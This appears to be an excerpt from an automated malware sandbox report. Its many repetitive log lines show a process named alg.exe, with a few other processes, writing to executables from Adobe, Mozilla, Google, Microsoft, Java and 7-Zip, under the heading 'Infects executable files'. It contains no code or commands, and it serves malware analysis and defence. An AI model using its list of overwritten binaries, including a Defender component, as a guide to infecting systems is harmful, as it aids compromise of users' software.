                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                  Infects executable files (exe, dll, sys, html)
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\snmptrap.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\Spectrum.exe
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\Locator.exe
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\AppVClient.exe
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\SysWOW64\perfhost.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\msiexec.exe
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\FXSSVC.exe
                  Source: C:\Users\user\AppData\Local\Temp\x.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\SensorDataService.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\msdtc.exe
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
                  Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to behavior
